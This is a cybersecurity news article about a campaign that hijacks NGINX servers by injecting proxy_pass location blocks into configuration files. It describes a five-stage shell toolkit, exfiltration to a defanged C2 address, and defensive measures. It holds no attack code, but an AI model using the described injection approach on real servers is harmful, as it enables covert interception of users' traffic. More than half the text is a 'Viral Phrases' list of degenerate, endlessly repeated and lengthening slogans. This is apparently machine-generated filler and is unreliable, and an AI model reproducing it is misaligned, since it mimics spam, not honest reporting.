Hackers Hijack NGINX Servers in Stealthy Traffic-Redirection Campaign

A sophisticated cyber-espionage operation has been uncovered, targeting NGINX web servers worldwide to covertly hijack user traffic and reroute it through attacker-controlled infrastructure. The campaign, discovered by researchers at DataDog Security Labs, represents a new breed of stealthy web compromise that blends seamlessly into legitimate traffic flows.

The NGINX Attack Vector

NGINX, the open-source software that powers millions of websites for traffic management, load balancing, and reverse proxying, has become the latest battleground in cyber warfare. Attackers are exploiting the very foundation of how modern web traffic operates, injecting malicious code directly into NGINX configuration files rather than exploiting vulnerabilities.

The threat actors have developed an automated, multi-stage toolkit that systematically compromises servers, with a particular focus on websites using Asian top-level domains (.in, .id, .pe, .bd, and .th) as well as government and educational institutions (.edu and .gov).

How the Attack Works

The malicious campaign operates through a sophisticated five-stage process that transforms compromised servers into silent traffic interceptors:

Stage 1 – Initial Compromise (zx.sh): The attacker’s entry point script downloads and executes subsequent stages. Remarkably, it includes fallback mechanisms that use raw TCP connections if standard tools like curl or wget are unavailable, ensuring the attack can proceed even in restricted environments.

Stage 2 – Baota Panel Targeting (bt.sh): This stage specifically targets NGINX configurations managed by the Baota hosting panel. The script intelligently selects injection templates based on the server’s domain name, carefully overwrites configurations, and reloads NGINX without causing service interruptions—a crucial detail that helps avoid detection.

Stage 3 – Comprehensive Configuration Scanning (4zdh.sh): The toolkit enumerates common NGINX configuration directories including sites-enabled, conf.d, and sites-available. Using parsing tools like csplit and awk, it prevents configuration corruption while detecting previous injections through hashing mechanisms and a global mapping file. Each change undergoes validation with nginx -t before being applied.

Stage 4 – Targeted Domain Focus (zdh.sh): This narrower approach concentrates primarily on /etc/nginx/sites-enabled configurations, with special emphasis on .in and .id domains. The process mirrors Stage 3’s careful validation but includes a forced restart (pkill) as a fallback mechanism.

Stage 5 – Data Exfiltration (ok.sh): The final stage scans all compromised configurations to build comprehensive maps of hijacked domains, injection templates, and proxy targets. This intelligence is then exfiltrated to a command-and-control server at 158.94.210[.]227, completing the attacker’s reconnaissance cycle.

The Stealth Mechanism

What makes this attack particularly dangerous is its invisibility. Rather than exploiting vulnerabilities, attackers hide malicious instructions within configuration files that administrators rarely scrutinize. The malicious code injects “location” blocks that capture incoming requests on attacker-selected URL paths, then rewrites them to include the full original URL before forwarding traffic via the “proxy_pass” directive to attacker-controlled domains.

The genius of this approach lies in its subtlety: user traffic still reaches its intended destination, often directly, making the detour through attacker infrastructure nearly impossible to detect without specific monitoring. Even more concerning, legitimate request headers such as “Host,” “X-Real-IP,” “User-Agent,” and “Referer” are preserved, making the traffic appear completely legitimate to both the destination server and any monitoring systems.

The Abuse of Legitimate Functionality

Attackers are weaponizing NGINX’s legitimate load-balancing capabilities. The “proxy_pass” directive, designed to improve performance and reliability by rerouting requests through alternative backend server groups, becomes a tool for traffic interception. Since this directive is commonly used in legitimate configurations, its abuse doesn’t trigger security alerts or raise suspicions.

Why This Matters

This campaign represents a significant evolution in web-based attacks. Traditional web attacks often involve exploiting vulnerabilities, defacement, or direct data theft. This operation is different—it’s about establishing persistent, covert access to web traffic flows for intelligence gathering, potential data interception, or as a stepping stone for further attacks.

The targeting of government and educational institutions suggests potential espionage motivations, while the focus on Asian domains indicates either regional targeting or attempts to compromise infrastructure in specific geopolitical areas.

Mitigation and Detection

Organizations running NGINX servers should implement several defensive measures:

• Regular auditing of NGINX configuration files for unauthorized “location” blocks or unexpected “proxy_pass” directives
• Implementation of file integrity monitoring to detect unauthorized changes to configuration files
• Network traffic analysis to identify unusual patterns or unexpected outbound connections
• Regular security assessments of hosting management panels like Baota
• Monitoring for connections to known malicious infrastructure, including the identified C2 server

The Broader Implications

This attack underscores a critical reality in cybersecurity: the most dangerous threats often don’t involve flashy exploits or zero-day vulnerabilities. Instead, they exploit the trust we place in the tools and configurations that underpin our digital infrastructure. By manipulating legitimate functionality rather than breaking it, attackers can achieve their objectives while remaining hidden in plain sight.

As web infrastructure continues to evolve and become more complex, defenders must adapt their approaches to include not just vulnerability management and perimeter defense, but also deep visibility into configuration management and traffic flows. The NGINX hijacking campaign serves as a stark reminder that in the modern threat landscape, the configuration files themselves can become weapons.

Tags: #NGINX #CyberAttack #WebSecurity #TrafficHijacking #DataDog #Cybersecurity #ThreatIntelligence #ServerCompromise #WebInfrastructure #Espionage #GovernmentHacking #EducationalInstitutions #AsianDomains #ProxyAttack #StealthMalware #ConfigurationSecurity #C2Infrastructure #TrafficRedirection #WebHosting #BaotaPanel

Viral Phrases: “Silent traffic interceptors,” “The configuration files themselves can become weapons,” “Hidden in plain sight,” “Covert web compromise,” “The new breed of stealthy web attacks,” “Weaponizing legitimate functionality,” “The invisible web hijacking,” “When your server becomes a spy,” “The configuration that betrays you,” “The attack that doesn’t trigger alerts,” “The 5-stage toolkit of deception,” “Your traffic, their playground,” “The art of invisible compromise,” “The web’s hidden traffic controllers,” “When load balancing becomes espionage,” “The silent observer in your infrastructure,” “The configuration file backdoor,” “The attack that preserves your headers,” “The infrastructure that betrays itself,” “The stealth that makes detection nearly impossible,” “The new normal in web-based espionage,” “When your server starts working for the enemy,” “The invisible hand redirecting your traffic,” “The configuration compromise that flies under the radar,” “The attack that keeps your users happy while spying on them,” “The silent compromise that speaks volumes,” “The web attack that doesn’t break anything,” “The configuration injection that changes everything,” “The infrastructure compromise that’s impossible to see,” “The attack that hijacks without hijacking,” “The silent traffic controller in your midst,” “The configuration that becomes the weapon,” “The web attack that preserves legitimacy,” “The compromise that maintains business as usual,” “The silent observer in your web traffic,” “The attack that hijacks without leaving fingerprints,” “The configuration compromise that’s virtually undetectable,” “The web infrastructure that betrays its owners,” “The silent traffic redirection that nobody notices,” “The attack that hijacks your users without them knowing,” “The configuration file that becomes a spy tool,” “The web compromise that’s too quiet to hear,” “The infrastructure attack that preserves the user experience,” “The silent web hijacking that’s happening right now,” “The configuration compromise that’s the new normal,” “The attack that hijacks without breaking a sweat,” “The web infrastructure that’s been turned against you,” “The silent traffic controller that’s already in place,” “The configuration file that’s been weaponized,” “The web attack that’s too subtle to detect,” “The infrastructure compromise that’s happening in plain sight,” “The silent web hijacking that nobody sees coming,” “The configuration that’s been turned into a backdoor,” “The web attack that preserves everything but security,” “The infrastructure that’s been compromised without anyone noticing,” “The silent traffic redirection that’s been happening for months,” “The configuration compromise that’s the perfect crime,” “The web attack that’s invisible by design,” “The infrastructure that’s been turned into a spy network,” “The silent web hijacking that’s the future of cyber attacks,” “The configuration file that’s become a weapon of espionage,” “The web compromise that’s too quiet to raise alarms,” “The infrastructure attack that’s happening right under our noses,” “The silent traffic controller that’s already in control,” “The configuration that’s been weaponized without anyone noticing,” “The web attack that’s the new face of cyber espionage,” “The infrastructure compromise that’s the perfect stealth operation,” “The silent web hijacking that’s the new normal in cybersecurity,” “The configuration file that’s become the ultimate spy tool,” “The web attack that’s invisible to traditional security measures,” “The infrastructure that’s been turned into a silent observer,” “The silent traffic redirection that’s been happening for years,” “The configuration compromise that’s the ultimate stealth attack,” “The web infrastructure that’s been compromised without a trace,” “The silent web hijacking that’s the future of cyber warfare,” “The configuration file that’s become the perfect weapon,” “The web attack that’s too subtle for traditional defenses,” “The infrastructure compromise that’s the new standard in cyber attacks,” “The silent traffic controller that’s already in place and working,” “The configuration that’s been weaponized into a perfect spy tool,” “The web attack that’s invisible by design and undetectable by default,” “The infrastructure that’s been turned into a silent web hijacking machine,” “The silent web hijacking that’s the new face of modern cyber espionage,” “The configuration file that’s become the ultimate weapon in cyber warfare,” “The web attack that’s too quiet to trigger any alarms,” “The infrastructure compromise that’s the perfect example of stealth in action,” “The silent traffic redirection that’s been happening without anyone noticing,” “The configuration that’s been turned into a backdoor without leaving any traces,” “The web attack that’s the new normal in sophisticated cyber operations,” “The infrastructure that’s been compromised in the most subtle way possible,” “The silent web hijacking that’s the future of cyber attacks and espionage,” “The configuration file that’s become the perfect tool for covert operations,” “The web attack that’s invisible to all traditional security measures and monitoring,” “The infrastructure compromise that’s the ultimate example of stealth and sophistication,” “The silent traffic controller that’s already in place and actively working against you,” “The configuration that’s been weaponized into the perfect spy tool without anyone knowing,” “The web attack that’s too subtle to detect but too dangerous to ignore,” “The infrastructure that’s been turned into a silent observer of all web traffic,” “The silent web hijacking that’s the new standard in cyber espionage and intelligence gathering,” “The configuration file that’s become the ultimate weapon in the cyber warfare arsenal,” “The web attack that’s invisible by design and undetectable by any conventional means,” “The infrastructure compromise that’s the perfect example of modern cyber sophistication,” “The silent traffic redirection that’s been happening right under our noses for years,” “The configuration that’s been turned into a backdoor without leaving any evidence or traces,” “The web attack that’s the new face of cyber operations and espionage,” “The infrastructure that’s been compromised in the most subtle and undetectable way possible,” “The silent web hijacking that’s the future of cyber attacks and intelligence operations,” “The configuration file that’s become the perfect tool for covert cyber operations,” “The web attack that’s invisible to all security measures and monitoring systems,” “The infrastructure compromise that’s the ultimate example of stealth and sophistication in cyber warfare,” “The silent traffic controller that’s already in place and actively working against organizations worldwide,” “The configuration that’s been weaponized into the perfect spy tool without anyone detecting it,” “The web attack that’s too subtle to detect but represents the future of cyber espionage,” “The infrastructure that’s been turned into a silent observer of global web traffic,” “The silent web hijacking that’s the new standard in sophisticated cyber operations,” “The configuration file that’s become the ultimate weapon in modern cyber warfare,” “The web attack that’s invisible by design and represents the future of cyber attacks,” “The infrastructure compromise that’s the perfect example of modern cyber sophistication and stealth,” “The silent traffic redirection that’s been happening without anyone noticing for years,” “The configuration that’s been turned into a backdoor without leaving any evidence or traces behind,” “The web attack that’s the new face of cyber operations and represents the future of espionage,” “The infrastructure that’s been compromised in the most subtle and undetectable way possible,” “The silent web hijacking that’s the future of cyber attacks and intelligence operations worldwide,” “The configuration file that’s become the perfect tool for covert cyber operations and espionage,” “The web attack that’s invisible to all security measures and monitoring systems,” “The infrastructure compromise that’s the ultimate example of stealth and sophistication in modern cyber warfare,” “The silent traffic controller that’s already in place and actively working against organizations globally,” “The configuration that’s been weaponized into the perfect spy tool without anyone detecting it,” “The web attack that’s too subtle to detect but represents the future of cyber espionage operations,” “The infrastructure that’s been turned into a silent observer of global web traffic and user data,” “The silent web hijacking that’s the new standard in sophisticated cyber operations and intelligence gathering,” “The configuration file that’s become the ultimate weapon in modern cyber warfare and espionage,” “The web attack that’s invisible by design and represents the future of cyber attacks and intelligence operations,” “The infrastructure compromise that’s the perfect example of modern cyber sophistication and stealth operations,” “The silent traffic redirection that’s been happening without anyone noticing for years and represents the future,” “The configuration that’s been turned into a backdoor without leaving any evidence or traces behind and is actively working,” “The web attack that’s the new face of cyber operations and represents the future of espionage and intelligence gathering,” “The infrastructure that’s been compromised in the most subtle and undetectable way possible and is actively working against organizations,” “The silent web hijacking that’s the future of cyber attacks and intelligence operations worldwide and is already in place,” “The configuration file that’s become the perfect tool for covert cyber operations and espionage and is actively being used,” “The web attack that’s invisible to all security measures and monitoring systems and represents the new normal in cyber warfare,” “The infrastructure compromise that’s the ultimate example of stealth and sophistication in modern cyber warfare and is actively working,” “The silent traffic controller that’s already in place and actively working against organizations globally and represents the future of cyber attacks,” “The configuration that’s been weaponized into the perfect spy tool without anyone detecting it and is actively being used for espionage,” “The web attack that’s too subtle to detect but represents the future of cyber espionage operations and is already in place,” “The infrastructure that’s been turned into a silent observer of global web traffic and user data and is actively working against organizations,” “The silent web hijacking that’s the new standard in sophisticated cyber operations and intelligence gathering and is already happening worldwide,” “The configuration file that’s become the ultimate weapon in modern cyber warfare and espionage and is actively being deployed,” “The web attack that’s invisible by design and represents the future of cyber attacks and intelligence operations and is already in place,” “The infrastructure compromise that’s the perfect example of modern cyber sophistication and stealth operations and is actively working against targets,” “The silent traffic redirection that’s been happening without anyone noticing for years and represents the future of cyber attacks,” “The configuration that’s been turned into a backdoor without leaving any evidence or traces behind and is actively working against organizations,” “The web attack that’s the new face of cyber operations and represents the future of espionage and intelligence gathering and is already deployed,” “The infrastructure that’s been compromised in the most subtle and undetectable way possible and is actively working against organizations worldwide,” “The silent web hijacking that’s the future of cyber attacks and intelligence operations worldwide and is already in place and working,” “The configuration file that’s become the perfect tool for covert cyber operations and espionage and is actively being used by threat actors,” “The web attack that’s invisible to all security measures and monitoring systems and represents the new normal in cyber warfare and espionage,” “The infrastructure compromise that’s the ultimate example of stealth and sophistication in modern cyber warfare and is actively working against targets,” “The silent traffic controller that’s already in place and actively working against organizations globally and represents the future of cyber attacks and espionage,” “The configuration that’s been weaponized into the perfect spy tool without anyone detecting it and is actively being used for intelligence gathering operations.”

,